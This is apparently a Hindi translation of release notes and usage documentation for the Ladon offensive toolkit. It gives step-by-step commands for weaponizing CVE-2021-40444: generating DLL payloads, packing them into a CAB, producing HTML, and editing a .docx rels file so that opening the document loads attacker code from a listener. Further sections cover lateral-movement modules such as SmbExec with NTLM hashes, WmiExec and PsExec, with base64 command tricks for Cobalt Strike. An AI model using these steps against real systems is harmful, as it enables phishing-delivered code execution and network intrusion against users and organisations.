
CVE-2021-40444 MSHTML दूरस्थ कोड निष्पादन के लिए शोषण टूलकिट, जिसमें DLL पेलोड जनरेशन, Office दस्तावेज़ निर्माण, और पेनेट्रेशन परीक्षण के लिए पार्श्व गति मॉड्यूल (SmbExec, WmiExec) शामिल हैं।
बीजिंग समय 8 सितंबर को, ल्वमेंग टेक्नोलॉजी CERT ने देखा कि माइक्रोसॉफ्ट ने एक सुरक्षा सूचना जारी करते हुए Microsoft MSHTML रिमोट कोड निष्पादन भेद्यता का खुलासा किया। हमलावर एक दुर्भावनापूर्ण ActiveX नियंत्रण बना सकते हैं जिसका उपयोग ब्राउज़र रेंडरिंग इंजन होस्ट करने वाले Microsoft Office दस्तावेज़ों द्वारा किया जा सकता है। उपयोगकर्ता को दुर्भावनापूर्ण दस्तावेज़ खोलने के लिए सफलतापूर्वक लुभाने के बाद, लक्ष्य प्रणाली पर उपयोगकर्ता की अनुमतियों के साथ मनमाना कोड निष्पादित किया जा सकता है। माइक्रोसॉफ्ट ने सूचना में बताया कि इस भेद्यता का जंगली में शोषण होने का पता चला है, कृपया संबंधित उपयोगकर्ता सुरक्षा उपाय करें।
MSHTML (जिसे Trident भी कहा जाता है) माइक्रोसॉफ्ट का Internet Explorer ब्राउज़र इंजन है, और इसका उपयोग Office अनुप्रयोगों में Word, Excel या PowerPoint दस्तावेज़ों में वेब होस्ट की गई सामग्री प्रस्तुत करने के लिए भी किया जाता है। ActiveX नियंत्रण माइक्रोसॉफ्ट COM आर्किटेक्चर के तहत एक उत्पाद है, और इसका व्यापक रूप से विंडोज के Office सूट और IE ब्राउज़र में उपयोग किया जाता है। ActiveX नियंत्रण का उपयोग करके MSHTML घटकों के साथ बातचीत की जा सकती है।
इसमें Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 शामिल हैं।
Ladon 8.9 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML रिमोट कोड निष्पादन भेद्यता, Office दस्तावेज़ शोषण मॉड्यूल प्रभावित संस्करण: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 शामिल हैं। [+]CmdDll cmd से DLL (विन सिस्टम 0day भेद्यता DLL निष्पादन कमांड पेलोड, सीधे PowerShell के माध्यम से CobaltStrike से जुड़ सकता है) ओवरफ्लो भेद्यता जैसे MS17010, स्थानीय विशेषाधिकार वृद्धि CVE-2021-1675 आदि, गैर-ओवरफ्लो जैसे नवीनतम Office भेद्यता CVE-2021-40444 आदि।
Ladon 8.8 2021.911 [+]SmbExec NTLM-HASH गैर-इंटरैक्टिव निष्पादन बिना आउटपुट के [u]GetInfo नई Vmware वर्चुअल मशीन जानकारी जोड़ी गई [u]OsScan नई Vigor Router राउटर पहचान जोड़ी गई [u]नई Xen\VBOX\Hybrid\Parallels वर्चुअल मशीन पहचान जोड़ी गई [+]GetInfo नई cmdkey, RrpLog, ड्राइवर स्थापना, सॉफ़्टवेयर सूची, हाल ही में एक्सेस की गई फ़ाइलें आदि जोड़ी गईं [+]GetInfo नई GUID, CPUID, हार्ड डिस्क ID, ऑटोस्टार्ट बैकडोर डिटेक्शन (DLL होल्डिंग, रजिस्ट्री आदि) जोड़ी गई [+]GetInfo2 नई WMI पैच जानकारी प्राप्त करना जोड़ा गया [+]डिफ़ॉल्ट जानकारी में C ड्राइव खाली स्थान की जानकारी 2GB से कम होने पर हाइलाइट चेतावनी जोड़ी गई
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
कृपया आवश्यकता के अनुसार संबंधित CMD कमांड का उपयोग करके DLL उत्पन्न करें, उदाहरण के लिए कैलकुलेटर खोलना।
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
PS: इस मॉड्यूल के लिए Ladon40.exe का उपयोग आवश्यक है।
Win10 x64 Office 2019
कोई भी परीक्षण संस्करण लें, सक्रिय करने की आवश्यकता नहीं है। यदि डाउनलोड IMG है, तो IMG को ZIP में बदलें और निकालें और स्थापित करें।
चूंकि लक्ष्य Win10 X64 सिस्टम है, हम 64-बिट DLL का उपयोग करते हैं। आदेश: Ladon CVE-2021-40444 MakeCab sc64.dll
HTML उत्पन्न करें, URL Ladon द्वारा सुनने वाले पते की ओर इंगित करना चाहिए।
नमूना 10 सितंबर को छोटे मंडल में भेजा गया था, docx एक्सटेंशन को cab या zip में बदलें, फिर rels फ़ाइल को संपादित करें, Ladon सुनने वाले पते poc.html की ओर इंगित करें, सहेजें और नाम बदलकर .docx करें।
Win10 पर doc फ़ाइल निष्पादित करते समय, Ladon सुनकर पूरी अनुरोध प्रक्रिया देखी जा सकती है। docx पहले html तक पहुंचता है, भेद्यता हमारे एन्कैप्सुलेटेड CAB फ़ाइल को लोड करने को ट्रिगर करती है, CPL के माध्यम से INF स्थापित करता है, हमारा DLL लोड करता है। DLL फ़ंक्शन कैलकुलेटर खोलने का प्रदर्शन करता है।
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Cobalt Strike के शेल के तहत SmbExec निष्पादित करते समय, यदि पैरामीटर में स्पेस और उद्धरण हैं, तो CS एस्केप में समस्या है, सामान्य CMD कमांड का उपयोग करना मुश्किल है। इसलिए मैंने b64cmd पैरामीटर जोड़ा ताकि CS में उपयोग करना आसान हो (यह विधि कुछ महीने पहले BypassUac में उपयोग की गई थी, कई लोग नहीं जानते कि ऐसा क्यों करें, सीधे CMD कमांड अच्छा नहीं है, एक अतिरिक्त एन्क्रिप्शन की आवश्यकता क्यों? जब आपके CMD कमांड में बहुत सारे एस्केप हों तब आपको पता चलेगा, CS एस्केप से CMD एस्केप में बदलना मुश्किल है)। b64cmd कमांड LadonGUI 8.2 बाद के संस्करण में Base64Unicode एन्क्रिप्शन का उपयोग करके उत्पन्न किया जा सकता है।
| ID | मॉड्यूल नाम | कार्य विवरण | उपयोग |
|---|---|---|---|
| 1 | WmiExec | 135 पोर्ट पर कमांड निष्पादित करें | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | 445 पोर्ट पर कमांड निष्पादित करें | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | 445 पोर्ट पर कमांड निष्पादित करें | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | 22 पोर्ट पर कमांड निष्पादित करें | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Jsp एक-लाइनर कमांड निष्पादित करें | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | WebShell कमांड निष्पादित करें | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | 5895 पोर्ट पर कमांड निष्पादित करें | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | 445 पोर्ट HASH कमांड निष्पादित करें | http://k8gege.org/Ladon/SmbExec.html |
PowerLadon: https://github.com/k8gege/PowerLadon पुराने संस्करण: http://github.com/k8gege/Ladon/releases 7.0 संस्करण: http://k8gege.org/Download 8.9 संस्करण: K8 लघु मंडल